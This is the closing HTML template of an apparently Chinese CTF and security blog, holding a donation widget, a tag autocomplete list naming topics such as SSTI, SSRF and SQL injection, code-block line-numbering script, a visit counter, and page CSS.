            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="//cdn.bootcss.com/jquery.pjax/2.0.1/jquery.pjax.min.js"></script>

<script src="/js/script.js?v=1.0.1" ></script>
<script>
    var img_resize = 'default';
    /*作者、标签的自动补全*/
    $(function () {
        $('.search').AutoComplete({
            'data': ['#WP','#python','#javascript','#比赛回顾','#LSB','#MISC','#隐写','#工具','#渗透测试','#mysql load data','#SQL','#SSTI','#redis','#ssrf','#Xdebuf','#ctf','#RSA','#xxe','#docker','#serialize','#php','#弱类型','#命令执行','#zip','#misc','#哈希长度扩展攻击',],
            'itemHeight': 20,
            'width': 418
        }).AutoComplete('show');
    })
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $(".post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().split('\n').length - 1, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0px;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 0.5em 3px 0.7em 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: ;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    
    .post .pjax article .article-entry>ol, .post .pjax article .article-entry>ul, .post .pjax article>ol, .post .pjax article>ul{
        border: #e2dede solid 1px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    .post .pjax article .article-entry li>ol, .post .pjax article .article-entry li>ul,.post .pjax article li>ol, .post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    .post .pjax article .article-entry>ol>li, .post .pjax article .article-entry>ul>li,.post .pjax article>ol>li, .post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    .post .pjax article .article-entry li>ol>li, .post .pjax article .article-entry li>ul>li,.post .pjax article li>ol>li, .post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.5;
        background: url("http://wx3.sinaimg.cn/mw690/006boCb9ly1g5kej6ap1bj31hc0u0wn6.jpg");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>







</html>
